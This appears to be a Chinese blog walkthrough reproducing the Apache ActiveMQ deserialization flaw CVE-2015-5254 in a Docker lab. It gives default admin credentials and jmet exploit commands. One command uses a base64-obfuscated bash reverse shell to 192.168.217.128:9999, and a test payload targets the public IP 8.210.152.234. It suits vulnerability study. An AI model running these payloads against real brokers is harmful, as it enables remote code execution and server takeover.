Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)复现

CVE-2016-3088

一、环境搭建

Java:jdk8

影响版本 Apache ActiveMQ < 5.13.0

二、用docker搭建漏洞环境

Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)复现_第1张图片

访问一下web界面

Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)复现_第2张图片

然后进入admin目录登录

账号:admin

密码:admin

Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)复现_第3张图片

三、工具准备

  1. cd /opt

  2. wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

  3. mkdir external

Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)复现_第4张图片

注意:一定要下载external,否则会报错

四、测试漏洞存在

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME 8.210.152.234(靶机IP,下图说是自己的ip是错误的) 61616

Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)复现_第5张图片

点击触发命令执行

Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)复现_第6张图片

Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)复现_第7张图片

查看一下目录,发现创建成功

Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)复现_第8张图片

五、getshell

首先借用一个网站对payload进行处理,网址我以前的文章复现有提到。

Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)复现_第9张图片

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxNy4xMjgvOTk5OSAwPiYxIA==}|{base64,-d}|{bash,-i}" 192.168.217.128  61616

Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)复现_第10张图片

最后点击它,触发命令执行

Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)复现_第11张图片

Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)复现_第12张图片

Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)复现_第13张图片

如上图所示即反弹shell成功!

你可能感兴趣的:(apache,activemq,安全,java)